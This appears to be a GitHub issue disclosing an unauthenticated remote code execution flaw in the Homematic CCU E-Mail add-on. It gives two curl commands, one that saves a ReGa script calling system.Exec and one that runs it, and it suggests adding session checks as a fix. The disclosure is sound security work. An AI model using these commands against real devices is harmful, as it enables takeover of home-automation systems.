You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Just in case the E-Mail AddOn is a popular installed software, it can be used by an unauthenticated attacker with access to the web interface for any Remote Code Execution on Homematic CCU.
Otherwise such calls are possible.
Step 1 creating the payload:
curl -X POST -i 'http://192.168.4.129/addons/email/save.cgi?userScript' --data '
load tclrega.so
array set values [rega_script {
var x=system.Exec("sleep 4;");
var x=system.Exec("/bin/touch /tmp/testfile1;");
var x=dom.GetObject("CUxD.CUX2801001:1.CMD_EXEC").State("/bin/touch /tmp/testfile2");
}]'
Step 2 executing the payload:
curl -X GET -i 'http://192.168.4.129/addons/email/testtcl.cgi'
The text was updated successfully, but these errors were encountered:
Just in case the E-Mail AddOn is a popular installed software, it can be used by an unauthenticated attacker with access to the web interface for any Remote Code Execution on Homematic CCU.
You may add a login session validation to al CGI scripts as shown in PR homematic-community/XML-API#31 for XML-API
Otherwise such calls are possible.
Step 1 creating the payload:
Step 2 executing the payload:
The text was updated successfully, but these errors were encountered: